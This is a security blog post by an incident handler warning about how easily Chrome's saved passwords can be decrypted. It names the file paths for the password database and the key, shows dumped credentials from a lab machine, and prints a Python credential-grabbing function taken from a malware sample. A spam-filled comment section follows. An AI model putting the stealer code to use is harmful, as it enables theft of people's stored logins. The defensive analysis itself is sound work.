Use Your Browser Internal Password Vault... or Not?
Passwords... a so hot topic! Recently big players (Microsoft, Apple & Google) announced that they would like to suppress (or, at least, reduce) the use of classic passwords[1]. In the meantime, they remain the most common way to authenticate users against many online services. Modern Browsers offer lightweight password management tools ("vaults") that help users to save their passwords in a central repository. So they don't have to remember them, and they follow the golden rule that we, infosec people, are recommending for a long time: to not share passwords across services. But it is really safe?
I'm involved in a security incident where some administrative accounts for web applications have been probably leaked. During the investigations, I wrote a quick YARA rule to search for the suspicious accounts across files on the developers' computers. And I found a lot of them stored in the Chrome password databases. The default path for this file is:
%USERPROFILE%\AppData\Local\Google\Chrome\User Data\default|Login Data
This file is an SQLite database. Hopefully, passwords stored in this file are encrypted but it's pretty simple to decrypt them. But the AES key that is used to encrypt the passwords is stored in a JSON file:
%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Local State
I won't explain here how to decode this key and use it to decrypt all passwords. This is pretty straightforward to be performed in Python. Here is an example of dumping passwords from a lab Windows machine with Chrome:
C:\Users\xavier\Lab>python dumppass.py Origin URL: https://selfoss.xxxxxxxxxxxx/ Action URL: https://selfoss.xxxxxxxxxxxx/ Username: xavier Password: xxxxxxxx Creation date: 2022-05-17 08:26:16.687562 Last Used: 2022-05-17 08:26:13.094214 ================================================== Origin URL: https://centreon.xxxxxxxxxxxxxxxxxxxxxxxxxx/ Action URL: https://centreon.xxxxxxxxxxxxxxxxxxxxxxxxxx/index.php Username: admin Password: xxxxxxxxxxxxxxxxxxxx Creation date: 2022-05-17 08:49:44.385977 Last Used: 2022-05-17 08:49:41.002207 ==================================================
If it's so easy to extract passwords from Chrome, many malware samples also implement this technique and exfiltrate your passwords. Here is a sample found this morning on VT:
def grabPassword(self):
master_key = self.get_master_key(
self.appdata+'\\Google\\Chrome\\User Data\\Local State')
login_db = self.appdata+'\\Google\\Chrome\\User Data\\default\\Login Data'
login = self.dir+self.sep+"Loginvault1.db"
shutil.copy2(login_db, login)
conn = sqlite3.connect(login)
cursor = conn.cursor()
with open(self.dir+"\\Google Passwords.txt", "w", encoding="cp437", errors='ignore') as f:
cursor.execute(
"SELECT action_url, username_value, password_value FROM logins")
for r in cursor.fetchall():
url = r[0]
username = r[1]
encrypted_password = r[2]
decrypted_password = self.decrypt_val(
encrypted_password, master_key)
if url != "":
f.write(
f"Domain: {url}\nUser: {username}\nPass: {decrypted_password}\n\n")
cursor.close()
conn.close()
os.remove(login)
My recommendation is to not store your password in these browser vaults but use a real password manager instead! Most of them have plugins available to work with all common browsers and provide the same ease of use! Stay safe!
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments
Anonymous
Dec 3rd 2022
10 months ago
Anonymous
Dec 3rd 2022
10 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
https://defineprogramming.com/
Dec 26th 2022
9 months ago
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
https://defineprogramming.com/
Dec 26th 2022
9 months ago
rthrth
Jan 2nd 2023
9 months ago